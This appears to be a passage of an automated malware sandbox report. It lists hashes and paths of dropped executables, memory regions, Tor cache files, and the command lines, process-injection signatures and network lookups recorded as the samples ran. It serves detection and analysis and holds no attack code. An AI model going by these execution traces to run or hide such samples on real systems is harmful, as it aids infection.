C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe

MD5 f5f05b4e22852d699553f8399700342d
SHA1 9becaafd8b9842a2f7ceb2d9c79e3f3a9e74780e
SHA256 29fe182485dbd31a363209137010cd008aefc271e7106cc00b2b964d4924d05e
SHA512 8493f4760ec2d2fb0c92b8061bc4fd971ac997a7bd11e7fb3d7fd4dfa2be871f4db36951793f9af1f175838437395370b2e95e13f4874d2c0d5289e6359f4596

C:\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe

MD5 827d26665815ffd3fcfae8b79d80339c
SHA1 23d02c60c3fbef1b402a14e8421c249d74eb02e9
SHA256 5d9624c5a99bfa8806a1c28191efa2a7661b0c1598814d570b8bacd00b3db117
SHA512 4ff51499a8ce5c8518b7881375fc7a80ff0dab249faa0bf0939273a5743be1029cab66e85e6272d1da4918835cc43fa1f9afba989f031421cdcdc1bf3de2c57c

\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe

MD5 3ee7d46e262a54bb4bea881caee7a6f8
SHA1 570164f39ee5af8e81faac44e64c5fdd450d2688
SHA256 7af8c1f013bddf37802003d9ce0fdb8a0b2e4ec7de6bf2486e9762b5f0860b5d
SHA512 88dcbde454b995a32ac7bbf6d105d994591e9fdffbf761e9b41b2bdacd2df5286fd6215cad60c578e15c329c3bf9438f410df1dfe6c9d67e0dc4cc86115770a8

\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe

MD5 a2dd6a76237be35534adc613d3d1ddee
SHA1 f4eb55694984485ece24290b9f44f1e3f3d83b8c
SHA256 4965f2e2090f8c49c16f994a7e556814ac07f74ea6de693619de26a6ef40e872
SHA512 9f3219ff2eaf5692566ff33264de1127c2835a516af01482008fba91fda690a45ab7ce78471562e32a7dcb3a63c661116c11f631218b85b1dd51ae3af9f87353

memory/2640-957-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1672-971-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe

MD5 c2785255a70a9862d959cc73592f74ef
SHA1 6e401fa6907fca6da01478785e4ff714ca7dfe83
SHA256 03e90160536c0ff0af0c1dde94ca528243fcfb5ae99ebffee7005d071dbb7d24
SHA512 51800c600fa03caa690db40ac5ac7be732d3a23e1d9137ceded0de1ffc2b60b21f25fab616d35c1a6da653d406fb5d156bc21724ebc9422f4adb70296f257809

C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe

MD5 bd6f68be18db87e17477231c32f8137c
SHA1 21544e9043e99e630fef5f5e7cfb4a0708a7e0d6
SHA256 59885e03435b50b18469c43ffb18951b7b918d2c70be3697fc5c153cef6b06d6
SHA512 74763454c75a0d073e6d40fb42d3643bb2152ae70196b89e2204b5a235f664e2108d21b7d848d4705b1dd31bb7d803a67cd44c1e5993612799a53c0fb66976bf

memory/1344-963-0x0000000004B70000-0x0000000004F68000-memory.dmp

memory/2552-962-0x0000000004A90000-0x0000000004E88000-memory.dmp

C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe

MD5 6f3e7321682ce4ef803555cc137878c1
SHA1 4170f6e78a4a6acfd62e6a713562fef4e8e353bf
SHA256 c9afb4eb9bde21cabb36a020f4322893bb8910887781d30b73cbaa3c876ee83e
SHA512 1f6c186c4dbdedd7417db100e5fe9848518d45cfe12738f95e3bb2dc258c762a1b260fb7e7a58a2aa1668ce06de81418cf9af19cf53c98c77da57d002b32f7b0

C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe

MD5 35bae145a5b4970e1f9390c6d7fe2717
SHA1 2fcbef4d77328e56176e6284d022182d4dc15500
SHA256 10251ee9ea6a1a9a3a732b404a5e46c5df6c2af3d2d879010cd77c1ce4e6fd3f
SHA512 23e4a1138b67b0142431d66f7dd2b2ced993b43023eda8ad4bf129e36789be9858e46f6dee848ea222894e6dfddf38b9bd5d3b173dcf17f63832fab2df27c275

memory/2964-976-0x0000000077830000-0x0000000077832000-memory.dmp

C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe

MD5 ca52e80fb811a8f7219510313681241e
SHA1 94e888816e188d0cb8801e3c49e0c80f4bff7a8c
SHA256 8b81f39568ce0764762f2e1692f256eec7034cb854c9339f58ca4018d9ea3763
SHA512 981fc036839010ede9eb4626b3aa791cda8123cf937514d22df086bbed5380d9562df9ee6bdaa83e22f50a562bed469dea942cfea9e4a47e12cf2f006ad649fb

\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp

MD5 40c92a8e43929c9d8f38c1cd29a33d42
SHA1 d736c68db624fdca36bd8c2b18d4a5cfad25e088
SHA256 1bea54b564637c6ea5b30839e6a2d12c3808f5c3e09c664f3aa8a4035cb910f8
SHA512 01bf5246ce33b09ac2a47bc0cfb103156fbee5c8e7bf8752d6a99eff83f627ba5ead8be7820b4d126cdca4f180474c069861837e8ab0837ec8037aad0b08f263

memory/2552-995-0x0000000000400000-0x000000000311F000-memory.dmp

memory/2184-996-0x0000000000400000-0x0000000002D3F000-memory.dmp

memory/1344-994-0x0000000000400000-0x000000000311F000-memory.dmp

memory/1552-993-0x0000000000400000-0x0000000002D3C000-memory.dmp

memory/1344-992-0x0000000004F70000-0x000000000585B000-memory.dmp

memory/2452-991-0x00000000001B0000-0x00000000001BB000-memory.dmp

memory/2452-990-0x00000000002B0000-0x00000000003B0000-memory.dmp

memory/2184-989-0x00000000001C0000-0x00000000001F4000-memory.dmp

memory/2184-988-0x00000000002D0000-0x00000000003D0000-memory.dmp

memory/2552-987-0x0000000004A90000-0x0000000004E88000-memory.dmp

memory/2452-1009-0x0000000000400000-0x0000000002D3C000-memory.dmp

memory/1344-986-0x0000000004B70000-0x0000000004F68000-memory.dmp

memory/2452-1019-0x00000000001B0000-0x00000000001BB000-memory.dmp

memory/1240-1020-0x00000000021E0000-0x00000000021F6000-memory.dmp

memory/1428-1018-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2452-998-0x0000000000400000-0x0000000002D3C000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-SGR2E.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2964-1013-0x0000000001390000-0x0000000001947000-memory.dmp

memory/1144-997-0x0000000000060000-0x0000000000DE3000-memory.dmp

memory/1552-985-0x0000000000220000-0x000000000022B000-memory.dmp

memory/2640-984-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1552-983-0x0000000002EC0000-0x0000000002FC0000-memory.dmp

memory/1672-982-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-SGR2E.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-SGR2E.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

memory/1552-1021-0x0000000000400000-0x0000000002D3C000-memory.dmp

memory/2964-1044-0x0000000000C60000-0x0000000000C61000-memory.dmp

memory/2964-1045-0x00000000009C0000-0x00000000009C1000-memory.dmp

memory/2964-1073-0x00000000005E0000-0x00000000005E1000-memory.dmp

memory/2964-1077-0x0000000001070000-0x0000000001071000-memory.dmp

memory/2964-1076-0x0000000001320000-0x0000000001321000-memory.dmp

memory/2964-1075-0x0000000001010000-0x0000000001011000-memory.dmp

memory/2964-1074-0x0000000001390000-0x0000000001947000-memory.dmp

memory/2964-1072-0x0000000001020000-0x0000000001021000-memory.dmp

memory/2964-1064-0x0000000000C70000-0x0000000000C71000-memory.dmp

memory/1428-1063-0x0000000000400000-0x00000000004BC000-memory.dmp

memory/1672-1062-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2552-1061-0x0000000000400000-0x000000000311F000-memory.dmp

memory/2964-1060-0x0000000001390000-0x0000000001947000-memory.dmp

memory/1344-1059-0x0000000000400000-0x000000000311F000-memory.dmp

memory/2184-1058-0x0000000000400000-0x0000000002D3F000-memory.dmp

memory/2640-1055-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1712-1056-0x00000000011D0000-0x000000000181A000-memory.dmp

memory/1144-1090-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe

MD5 c2a372e02b6327bbaf342052c46f3cde
SHA1 cbe2c5d354f6af699f48d99107df612dc678dda7
SHA256 4440d65d26bdcfb5ec6c2c39e1c46a79334f57c43a64f929abcba6e3e7c53f6d
SHA512 f53b3a77a3c5d04644fb27952272211b515b41e373d9408e73ad96e2e260624758db5d57b00bf920d58b833f62ef2a0993364ef1630696c8efd74dc78437c6a9

C:\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe

MD5 58cab5bf52fb504b3f59588688c0311d
SHA1 94e01c814e4c7a80e4c4a74299280e59ee359973
SHA256 0bf67a79e2359d3c3cc25d168146f2a1a6c463d842f2d4b263628216ed5f6540
SHA512 dbce20d0887744762357aec164583fe5943d168ac025f8a1c800b201cb22f1208d435e5f5cd06243e4776cd3cf53596f078e74b95b6c600e22499923512abce8

C:\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe

MD5 0546f87c644933402f384d71729b04bf
SHA1 a203ddd527026801c8471d3709054029bf9af57f
SHA256 8809d9bdb709a13564e73c5a391b14bce9fa3535edd7dc5c32e123d4a7a3ba19
SHA512 f7bfa275c879f0b19c005c0657c7374cecdf8806275e72cff1cdd5c67e48ea6c5277467baebb766896b3a6e65cb2d88ce032b1f78536cc25362848613dfcbb91

\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe

MD5 ea64d4a6be3adc60a58a265efa256116
SHA1 71d17dc40040eb960c71382b6a1d74a6c9f574d7
SHA256 cd8a826d8d27be964fff324d502c6cdf567a992118526b8ea078bf0e598a7053
SHA512 fe2c64e66104adf20aa7934470bdba669f39b9d613e7c0409f19883ba0f7648ca9f5f44ff3a14a7cb60fa457344629a375251e77de3a34d469dc5ebf182dcbbd

\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe

MD5 d7ae760d1d05cb0c45962a594e3bb7f6
SHA1 5b766ed71a13204b86a3eab97eda7ce7e2803b72
SHA256 24f1244d3cba2b9b71297222f42886c038398054b9e6f4b039c5b68561e45bce
SHA512 f22ac5b5f96b94196c4230470ca55bf73b7f0860708f40aa7ba1964fe40f3088137f1d2b99131eefce392efc47b237726412e521258d73dae96a13d85318737c

memory/1144-1099-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

memory/1144-1108-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

memory/1144-1111-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe

MD5 7d79c791f56eab15497c93bb978811c7
SHA1 d96e8764ce800b637b5c081badf5ebf76c23604d
SHA256 1cd4a14403c41ddfaaf341c46ba7d9026e0e2dacc0701f9f5e845abd38a30402
SHA512 8415246bdec9845c0c8baeaff0ffdd30e46a29fa21970e89a11f639b22f36fb0495a1d15e84efb787c7fb60913e168880c828fed3efce8e474a49b8a9211914b

C:\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe

MD5 40890ae2e936472ca485ad31225693b2
SHA1 61363a721cb4d6dd7ae7920e34b04095b7b84dea
SHA256 741198168dfe745aa6b016fc57d24832a76fc39988d9e36930a20c53357e5248
SHA512 6ae93478d0ec97ee211d219c10113aac77449623e3596b7928eea69098e1918b07a3b9d9e84e57a6f992f677a9664ba13e7a734c9125cfb36c1a454a1289fe2b

\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe

MD5 9c28b329e702adbca7d0b7d25f5f0cca
SHA1 64ae19084eeb8a68f40a1196b23c44f74af50af9
SHA256 bb588c90fd88dec701bb342cb5d22bbcad9a0ef5f4030e4ee13699506b32ff81
SHA512 df6c132066d395f560b36ea74a0eb53c66c878c4796c3a3f2f93f5373093c4a9e86b84ed30812b406f24a2dab811a0e20da2a0fbefdf74d73ea45a1340133c14

C:\Users\Admin\AppData\Local\Temp\FF07.exe

MD5 3724451ec0294249242ae38e1a0f7b25
SHA1 b5106f25f9947400c8db8f7029dee557da099fd1
SHA256 77cb2044cbc967ba492850d177c98f3deb468a321e2adfd476783c52dbfa4fbf
SHA512 c1f7edb15d5847a4ae2e313178a688237ba79eb971be9e25dbce066a7db96bebbfc57c39f25fed848deb8fd3ca277b274d082f57a34d5f154e76a885021fad84

C:\Users\Admin\AppData\Local\Temp\FF07.exe

MD5 4eb40f1a33f203f8dff454c3f3be4b46
SHA1 70fa6b39f06c95f3fda8c21ace5510a896d7fe1a
SHA256 0604f07976533d0969a7ab0d54f521702dbd9176145a813be284d8c7de1e8a20
SHA512 47cb541879aa2e438df0ddbcfb9b4e821a8b09d82e97a3ba7d6aa42db7f19a370c6a5e1caa95be63c6620c1052a24ebeca733476a597b1fbd054f9ab89b41308

C:\Users\Admin\AppData\Local\Temp\FF07.exe

MD5 d8c737fe89b9cd71eda2cb96c53f058a
SHA1 e1f7acc79a8aa902c1c6b913c6dd71383ba3a6b4
SHA256 f73452f0f414bca5f67f9a4d3e9b37284961bc7cacdbc7a6ee19a53e9a3d91da
SHA512 900fca6f0d356ef4ba1567c2db0373e649ec7192e2237201d6c6ae7168d5d171335764ad9d3b3e8a8b3b9eb8e3900ce1ec38dd7a1b33a0e3a608e23c64cd54a0

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

MD5 3384df11645214991c43cc79c6162542
SHA1 0c0eb94d9f00aa8388134b56f5518549772941d5
SHA256 c16d54482c78c77562c21f8a2e2463360d923c208cad1c80826bf8267182453a
SHA512 0faf6bae1e84efde2e197b31678e52dc74dde930852810b3b5db01148faa92efb1841b46a831fd4e73f2d67df27f1dbadb3111f1bf8272a965976a74b8988c68

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 e05046201fd81921b7688a29b9c61cbc
SHA1 04bd579b42bd45156569ad63e5a23893a316c0c4
SHA256 1324d67ba05fc87d734c72dbee505e7cd8402766d39d0408d36ed97f93b0e37a
SHA512 6081c0b628a9b7da96856c1ceff2ff8e9994d49e356edcbd871d5fd6659914d55e78e4c0d492a8385a79ad1dfc52e5920556ee177a3d5d606cd0781cfda7771e

C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe

MD5 7e6d304f94b7413e05462a6256ebfd3a
SHA1 771ad41ac14c3d4ea101e94a088dcb95fc22a1e9
SHA256 1da512678c1343da62b47af2859849816d8e6a1943306c5f345091e719510fe6
SHA512 b6fb6c47412ddda4c33fe429a29d11355abcbc0bbc3b51aacfcb452ac9f7b30eabf72df8a2a1346224d751747c3dc08553416949597d2836094dc6babde0bf93

C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe

MD5 75fd41e8b9312cdc5e12869b3f8e120a
SHA1 7ad734927bb5f359d1d710f51508cb24cdec73d9
SHA256 25d1dc125433097e2fcacc0892ac2ccf4c0e378eff2cc3f6881992f2641e8d03
SHA512 94cff0b426135678f4efc1610aaed8ce659189d28cb6b4d4e9a9fd868ec87227327c1cf53284719dce3d4c4aad97ae0b1b1c734ae9250afaf2d00c8700eaeab8

Analysis: behavioral5

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:49

Platform

win7-20240221-en

Max time kernel

117s

Max time network

132s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 228

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 204.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 196.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win7-20240215-en

Max time kernel

117s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

N/A

Files

N/A